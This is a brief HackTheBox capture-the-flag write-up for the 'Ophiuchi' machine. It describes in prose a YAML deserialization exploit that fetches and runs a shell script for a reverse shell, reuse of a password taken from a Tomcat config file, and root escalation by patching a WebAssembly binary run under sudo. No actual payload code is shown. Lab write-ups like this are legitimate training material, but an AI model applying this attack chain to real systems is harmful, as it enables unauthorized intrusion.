Ophiuchi | HackTheBox Writeup

Overview

Ophiuchi is a medium Linux-based machine in HackTheBox by felamos

User Part

Start with nmap scan found 2 open ports

22:SSH

8080: HTTP

The Website shows, It’s a YAML parser website.

Then I searched for any exploits of YAML and found one.

In that blog he mentioned the exploit code. 

so I tried that payload in there and got Request from Ophiuchi’s IP.

Now I am sure that this website is exploitable, also in that blog he mentioned a Github link to this Repository for further exploitation

I cloned that repo to my local machine and checked what is executing.

On the repository page, he mentioned,  put java code I want to execute in  “src/artsploit/AwesomeScriptEngineFactory.java”. so I checked that file.

I changed that to check whether it executes correctly or not by checking the ping request.

For that, I changed the code in AwesomeScriptEngineFactory.java and compiled it as mentioned in the repository.

started ICMP to capture requests and got success.

For further exploitation,  I created a shell.sh in my local machine and changed the code to download and execute the shell.sh in the machine.

I got the reverse shell in my terminal

The next step is to escalate privilege and I found the admin’s password in tomcat-user file.

Using that password I can log in to ssh.

Root part

I checked with sudo -l to check which commands I can run with root privilege.

I checked the file.

From this code you can see reading main.wasm file,

if the value of  f=1 then it executes deploy.sh. 

For the exploitation I copied main.wasm in /tmp folder and made a custom deploy.sh file for reading root.txt.

But I got this message, “Not ready to deploy”.

I search google for decompiling main.wasm and I got a StackOverflow link.

In the comment, one of them mentioned wabt

In the repository as mentioned, I can decompile wasm to wat and I can recompile that to wasm.

For the installation part i got answer from this website.

I decompiled it and changed const value from 0 to 1.

Then I recompiled to wasm using wat2wasm.

I uploaded that and made it executable.

i executed and got root flag

Share on facebook
Share on twitter
Share on linkedin